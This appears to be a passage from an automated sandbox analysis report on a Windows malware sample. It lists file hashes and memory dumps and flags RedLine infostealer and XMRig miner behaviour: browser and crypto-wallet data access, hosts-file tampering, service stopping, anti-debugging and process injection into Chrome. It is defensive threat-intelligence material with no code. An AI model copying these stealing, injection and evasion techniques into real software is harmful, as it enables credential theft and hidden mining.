SHA512 c8d6b95309fcee3760d1620c8f30cb72449ceae4e89938c75fa6799b676949aec176a6da902ab67d56bc692b53b90e1a71b5435e3cc90d6fc0b9de3604bfa75b

\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/380-542-0x000000013F380000-0x00000001405A6000-memory.dmp

memory/2516-566-0x00000000775A0000-0x0000000077749000-memory.dmp

memory/2516-572-0x000000013F380000-0x00000001405A6000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Code Cache\js\63f0cac7b2db289e_0

MD5 52942a43e3096defdba6baad1b332fbc
SHA1 6562a0ec5d375baaee334bfa2c10272caef22645
SHA256 3bb5aa85187c0972f8a97f8b8e5b1b02e1fee19c24dec280e2dae7e1d33bedf5
SHA512 8e634ccb594b48f487804272b8956a40419c8d01b73c81eef38ef374584b6b2676fae6b40b39a99c64f857030dc62e6439b335a3778001e0ca7e8afa1f0756ae

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Code Cache\js\60ae0d0fe9088cac_0

MD5 11ad88848abf5dec51338ab1ab78adb1
SHA1 808313407d16f347f893cb97799206c6797d92ee
SHA256 a5ad5e53a6e71e618cde4a152e1a159ad53e914b799c8bc35dbafa1eb4d5e3ad
SHA512 bc5f4982d140c5438f19e47972d23e27aa6cae0ca81d8915bdf6a009f0e5afac4bfe578ec03ccdd4460a0405d76c5ffa6b489b8f0fbda7d5003d3b22c5b0030a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Code Cache\js\5ddeaca7fe64ca95_0

MD5 7f8fa344cbf81a452ab82fd71b891bbf
SHA1 c6a4b2f291e653dbab263ac1358f85a3ba13e611
SHA256 625c3a72ed9fb322139853bc98919a1cb1964de3a6593e70631f44a22792693d
SHA512 51ab30e0a9b4a4a2121d4b806e462f8c601d0498f30b15bc002e4ef3671b49e52e6ebf59024c6f9511460f42369f96a7833e273add01b93bf32efd4450cd9f0d

memory/2652-641-0x00000000747E0000-0x0000000074ECE000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Code Cache\js\5b76df05a935e848_0

MD5 f7af91881a1ee3092ba20fba5a68f9ff
SHA1 27aa92fabdcd1cd47001ad57a9fc8baeb4ce8b36
SHA256 7141e393363d0915ff12c55d58dc7b9247b195e04c9430296b9ad92578e0b6f7
SHA512 6e2694ad891d99c6bd3de176009b2c807a5913b3a14bbd609f0d128a7ba745dc11884a67b28a15b3e04cac834e00ff605833e6d10c26395639403081fd8f6b05

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Code Cache\js\2e64514b9cd267ab_0

MD5 4e07542589eb076a686c7611dc39053c
SHA1 c5486d14eb73e41430afcd2695258ad0370b4914
SHA256 12585d393c991353efc197952e0b20da5eae5d1ab4cd05382832f8b7152163af
SHA512 957687a89e06b13309041d31caf9726fca941a3f9a016e408e5ba0c2627e09e34e4ce678ed1025f70e83958717b4450ac4428c72513a67ccad16a2baebdc3a62

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Code Cache\js\17e99028d152eccd_0

MD5 4ab5a77c47fe3992e727f934f543244a
SHA1 906d3de49ea0c0731feb422f41da067a4cde6e76
SHA256 b530e820cefeaec0d3ae9391c9aa9c0fde18904c091826467cf322937a9d18f9
SHA512 f9885fe231c86d96f547b1d8376c2df82a66b578545a4d9df2cec5311925b6c61efa269b00aed359d500c409f55ef6e4fade80bd175ca82893e869c2efb32de2

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Code Cache\js\0b008848303808fb_0

MD5 6d11d21e50bb502893d8c205721775f8
SHA1 df9084237017f61af9c6eb078385f4423a2d2761
SHA256 797869f97ca2dabaca5c345799c969467070a5ebdaf9a19d06a3df92a3312a73
SHA512 49bdc036ee70945679bce10d55e3af8274ad9a2ca506a52c3547dc1eadd5618986805485a88dfaa48b15fb4f854ca1952358c9271496fdcfe7174c0f5f68b87f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Code Cache\js\056093a36a95204b_0

MD5 6e7f652fd13d38b09de6161ae8371c68
SHA1 c81bf773f339cb1698a43e4a89a9a0dd2343414d
SHA256 39e724cffce6a770ae9491002871c7304bc3a7852bb2236f72f85d01c8804c51
SHA512 25667ff9b542ad97864f4540a3e39c9deff7e07f1a4184081c6e157afdb2d88e0dc5c7b892695de0049d8423b494ed7788721dc7a8c83845a055169fb3914b7e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\index

MD5 4fa53c4a044c0f016708d2dca78f4a39
SHA1 b15453773f8405679c5a40b535ee89c239981e72
SHA256 dd8e173d8771238f25e1aab2d5b035c4764da7c687bc211ad36951e73c40e12f
SHA512 062fec9335950a0b46c289021ff91876a333aadbd666b7f66b6012c32635d1fec8552e3faed553c6482555e6c6bead73643bb5ceb4d095991fa38b9171634561

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\f_000010

MD5 b0a362c36845f8359c4e7e539a0e7a29
SHA1 3144714e7f625f881cbe7d9a254bfaa5a522e7e3
SHA256 ca42445b1fe4113733449448e9ce7d71a0cb2a205a4954114d70dd8325ef59f0
SHA512 347d97d19f351012b3b61b19bcc01eb2ad6270975f23f8038c0d85d7ca2ae8ad5a19ecde212e28c3eeb5c0b1d518672f2203c88e9d17bc9fad7e238abf1ded3b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\f_00000f

MD5 30e100f268904a324de370b4dd1b3a15
SHA1 e55bd484a1cc63e38ce8ede97f1fd003a09fa731
SHA256 94e5b2913202528d6218f688e873d74ecfbf27f571cc197432ecd60cfa904e0c
SHA512 b2dd1e631f297d9619d6d7bff1e76614788046c7d1664d8a039306eb35bb054f174c54761dbb6028946685bb6d807753119f97611d7aab20d273c6b9bba505e7

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\f_00000e

MD5 789fd4f17cc11ac527dc82ac561b3220
SHA1 83ac8d0ad8661ab3e03844916a339833169fa777
SHA256 5459e6f01b7edde5f425c21808de129b69470ee3099284cb3f9413d835903739
SHA512 742d95bb65dcc72d7ce7056bd4d6f55e2811e98f7a3df6f1b7daef946043183714a8a3049b12a0be8ac21d0b4f6e38f7269960e57b006dfec306158d5a373e78

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\f_00000d

MD5 189badc72a668aade50699ae05067c2a
SHA1 5458410fc96bcf08b29f204b05470dad5882afb9
SHA256 896d76b06fe7bc62fa10e8f9091b84584d8fdbd7eaaea1183f7c1e5e3a98c559
SHA512 287ff71f9b6ab261f989792cfee0b99e1745c57e8e8c9c3c55e07592a835008673a9ee5b2099ef9beb6ef4343c10827109b281b2fbed0fe0de1da020723c622b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\f_00000c

MD5 f67dde285de5f831537c104e505e2f05
SHA1 9c967dd7e4b45de90af20983e78cbd315f7cc700
SHA256 918122ce975ea0a50f0da079028f0a059129d7fad0aeb7a4a52a13640a80dcae
SHA512 2762d03ab4e317fc1c08077ecf08e4c8f05be73abd18c441b2e4480b4b177c13f51056fce403997b9337739a1a180d114ddcd223109af815e38e046b9baa7845

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\f_00000b

MD5 2d52125a96fb5a7227c67848bc18f65c
SHA1 a3593c6d8e3b6b458b6bbc2c6423dc76e30a84a3
SHA256 61f3154c19e46e1989d6fadbfe20835d0c9fc47242dc5828e776e3ec667fda24
SHA512 5f151708007cb474e64e8968b1f6b5e5331c434cc237627c6c5c92d1894d020f476ad88461e35fbf383aa46750a9cdcaf3a2ac8fe90570753c73fcf17ac0cbe6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\f_00000a

MD5 9f1c899a371951195b4dedabf8fc4588
SHA1 7abeeee04287a2633f5d2fa32d09c4c12e76051b
SHA256 ba60b39bc10f6abd7f7a3a2a9bae5c83a0a6f7787e60115d0e8b4e17578c35f7
SHA512 86e75284beaff4727fae0a46bd8c3a8b4a7c95eceaf45845d5c3c2806139d739c983205b9163e515f6158aa7c3c901554109c92a7acc2c0077b1d22c003dba54

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\f_000009

MD5 c101a8ba729b894927d7d884e4be68a8
SHA1 4bf48f94ff4e50e81c9d83b641af74b3bed580a0
SHA256 544f08482a62485be4acbc443462b01fe16b408b3d154c0cb1ff921a453cee33
SHA512 77483a92abeed799dfb1e782988569875b29eccebfb14e5be353302849ea6f0ac6a6411a72d6da706ec3767a54f12907fd0bfa4646ad4ca1cf4e1e15fbe9a9ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\f_000008

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\f_000007

MD5 6a3bb9c5ba28ee73af6c1b53e281b0cf
SHA1 d96e403c99c1707f82ea29c2c1f134e792c64097
SHA256 2f5adfc38558162578ffe112229f10417fbc4b3df025d153d4e22a0c95177740
SHA512 6c4844f70969938339cb6716a834a79e1a8379459c87b983c2518b9cbb560cb2f101aff980f682989928523be6cdc99bde3bfd8137f9c54a58191b900b580fbf

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\f_000006

MD5 65a09e97ec3cc5c8b2ffac61b1a559a1
SHA1 d860ca3feb86bb4e4ff46a1142b9bb3f9a83942f
SHA256 cf4050588287f0c6622f2386a2b841ffff3f82b7720bd60ac35130b65c9ad4ed
SHA512 fde13ac7468fef3d1f470ba9514f4dd4d671806b3329e672ce42a7beba351e17717c6043a2620c895916fa637f98c28aa19db7556dc98955600f5a0a19165d8e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\f_000005

MD5 1c2bbef38669bdb22d2b69b9c967693e
SHA1 2648bad2609c344cdd73379de590b5e5e38512a2
SHA256 e469b761fd251fcd7f423530bf2054ee02e5bf42b3af894e1b15116e19348ff3
SHA512 c7d50e9787f615aa4c7721cb1f7edb5be2085c2fd9d6b726862cb0ce2244d3a6e1ceb1e3e17fc256ad662c411294b33faf4da358f2074f6999de74bac2741ec6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\f_000004

MD5 a4a9883617c3683d7f31e1420b3d84a6
SHA1 4c143fd9076507f8a299f9928da81c41818e29da
SHA256 242bdfdcaa5556386f558a1320bd8177e8dfe107a5623a8c82c1cf59daff125d
SHA512 242a425ded0fe6f2a2b3da1172e885bee9f898a62cda6c21e2189655fdb488bd15c21fa0bebd56d8fbedcf7fff86fee2fdbb0c00ed5c3ad8434e9f5ddcbc067c

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\f_000003

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\f_000002

MD5 1004b3178d9754cf8d8fc84e84af3fca
SHA1 b3433dbc533ca7e9e0ec51f65b6b0959c9972466
SHA256 97694c8fd1b6b9b06e6ad8707d8ed88fb77868487b48815cf8ada3c767365536
SHA512 e49a691d54e22204e67c99ec223dc65577466031c202090b3a662d7dee12a5ea2c7183563e5db911c705b5048124a64c6a300d017fb54074ee1c5f8523a23fec

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\data_3

MD5 4efd52a3659408e2992597f4cff0e9b0
SHA1 594e641de628a8ce18e313151cd93faeab03cb09
SHA256 4a4ad3d1322185c1811656ade6c355d02c07856668af98a4bf731968b6868492
SHA512 b866a9636baa230b07201d136ee4da14b2e855e9deefb7f3789c6359ba8f2afa8e1e1337e953ff8401b532f16a2de59286ea98dc261ef9d53bbd201bb7c623c3

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\data_2

MD5 f1b04c9be144fa0c39ba1fbc54c387fd
SHA1 f7deb2858033f1dd9abdcc7b01ad1d54d1b921da
SHA256 3c4e084c63b162ce9d44f40f0daee7a8648bfab2d153b03739f4442af84b62ad
SHA512 e026932dcdaf6b1c632e3c4988eb7f1df1aa70345b305b6347ecc078af477338e6d4d6afadaeb1f480ef26831c354f4bb5f868cae96058a0385ccabe77ba9e71

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\data_1

MD5 883689b4df1ab4088733834a74f7abc8
SHA1 a6baab15b60d6b37d1c76ce00a89f09e4588ad27
SHA256 08fd23d3060540426c9be17d24c88af9361d469d687375a931e89e7f7a9cd80d
SHA512 bbc2825acd88c4a36a67ad07d091380f190aaa0c2fcfd1fc4e97f89b10349a3281855610ea53b7597b1749e37e45e86193b9499c667f2ecd3494c4a852713e55

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Cache\Cache_Data\data_0

MD5 27d036d1ac77db850f874c36352c781e
SHA1 a54b28dd81395d1ea59540a8ab32676225b045f6
SHA256 a8d4fa5b5535bf104c9c278df697153be2229e3bb6806f9e1f7f6ff442093f8f
SHA512 c1401c828750f9876d589f7b12a112600c9684d04ea0c5561dcbc8a221edd40b270f8c08ac87e79ef8e6e22a9061add3b5432ba2f496b2699eacf9729e2bb289

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Crashpad\settings.dat

MD5 e2ed554bc8ed84124d8cbc60811992c3
SHA1 3e2c9ce94ce60cea2b1867dfbb4e7d915e53cbea
SHA256 0fcd36faed007c2e1584a80aa4f7e29ece7371256be0489b8c96ef59c0345a80
SHA512 71aafd1cf7266345e7b9ff05dae9e8bae76629da062d81d091fd873bdb7afc23cd2c51ee1381a8d5c2c7b6a55c259c78f701abae6a12ad2e8fa16045a914a6eb

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\DevToolsActivePort

MD5 6daa5a71c3c5d9c99689c8fb469a29ca
SHA1 b1e1ad7cbf7092ba607f926a857639060558f913
SHA256 87fa8ed60cd5a50e665e1f53b8ceeb1de635ede95281051c8462329a09d15436
SHA512 85942de33330989391f666890a2084774bc3025314ec2281ab7e404992a0b3cb6b2a7313ac978aca36dc4b3d1655fdd8dab6b9da2ca167d7e33c3d8c11d2553d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Code Cache\js\343f6993e27f1d39_0

MD5 174c33a70785eebba3db88aebf9c36fb
SHA1 acaab9f213e6a5919b53dc0acfb924788dcb5332
SHA256 1cf0017fd76a2c9a249f9870f4707e9b69714915c661b8cac5bb10d37cd7866c
SHA512 d8896b595028bf46e6f511fe5417e422f50a66cbe852bc4c4a66a0c4420e08f0bf6eeb82633e1625a98055a1d742ceb792487ddee3794dc97741550a004d2644

C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Default\Code Cache\js\06db5837b6c74111_0

MD5 cc66747df689407fb50a279920cef74d
SHA1 db5875af6460551bc00c703914a0f2523813cd76
SHA256 bf86c9aa91c57124caaf7a5bdec0c7fd0e9dae659335bb7e6b7fa86fd527dab4
SHA512 b549a2583f13ffaa5455f28aeb0e7fdaee74b3249d630b34a77c7576893765631c1a35c5e4fc2f772cd11d1189917617d113ab78f3baccf059c0473f450404ec

memory/380-663-0x000000013F380000-0x00000001405A6000-memory.dmp

memory/2516-664-0x00000000775A0000-0x0000000077749000-memory.dmp

memory/2516-665-0x000000013F380000-0x00000001405A6000-memory.dmp

memory/1612-666-0x0000000019B70000-0x0000000019E52000-memory.dmp

memory/1612-668-0x0000000000240000-0x0000000000248000-memory.dmp

memory/1612-667-0x000007FEF5180000-0x000007FEF5B1D000-memory.dmp

memory/1612-670-0x00000000011C0000-0x0000000001240000-memory.dmp

memory/1612-669-0x000007FEF5180000-0x000007FEF5B1D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-11 00:10

Reported

2023-08-11 00:13

Platform

win10v2004-20230703-en

Max time kernel

80s

Max time network

129s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4516 created 3212 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 4516 created 3212 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 4516 created 3212 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 4516 created 3212 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2856 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2856 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2856 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4868 wrote to memory of 4516 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Windows\Temp\setup.exe
PID 4868 wrote to memory of 4516 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Windows\Temp\setup.exe
PID 2856 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2856 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2856 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2856 wrote to memory of 64 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2856 wrote to memory of 64 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2856 wrote to memory of 64 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 756 wrote to memory of 3704 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 756 wrote to memory of 3704 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 756 wrote to memory of 4132 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 756 wrote to memory of 4132 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 756 wrote to memory of 3780 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 756 wrote to memory of 3780 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 756 wrote to memory of 4284 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 756 wrote to memory of 4284 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 64 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 64 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1116 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
